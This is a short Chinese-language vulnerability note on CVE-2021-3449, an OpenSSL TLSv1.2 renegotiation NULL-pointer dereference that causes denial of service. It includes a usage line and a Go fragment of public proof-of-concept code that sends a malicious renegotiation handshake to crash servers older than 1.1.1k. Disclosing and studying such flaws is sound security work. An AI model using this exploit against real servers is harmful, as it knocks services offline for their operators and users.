# OpenSSL 拒绝服务漏洞(CVE-2021-3449)
OpenSSL TLSv1.2 重新协商选项(默认开启)中存在一处空指针解引用,并导致拒绝服务。
影响版本:
openssl:openssl < 1.1.1-k PoC: ```
Usage: go run . -host hostname:port
``` ```
// CVE-2021-3449 exploit code.
if hello.vers >= VersionTLS12 {
if c.handshakes == 0 {
println(“initial handshake”)
hello.supportedSignatureAlgorithms = supportedSignatureAlgorithms
} else {
// OpenSSL pre-1.1.1k runs into a NULL-pointer dereference
// if the supported_signature_algorithms extension is omitted,
// but supported_signature_algorithms_cert is present.
println(“malicious handshake”)
hello.supportedSignatureAlgorithmsCert = supportedSignatureAlgorithms
}
}
“`
ref:
* https://github.com/terorie/cve-2021-3449
* https://www.openssl.org/news/secadv/20210325.txt
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容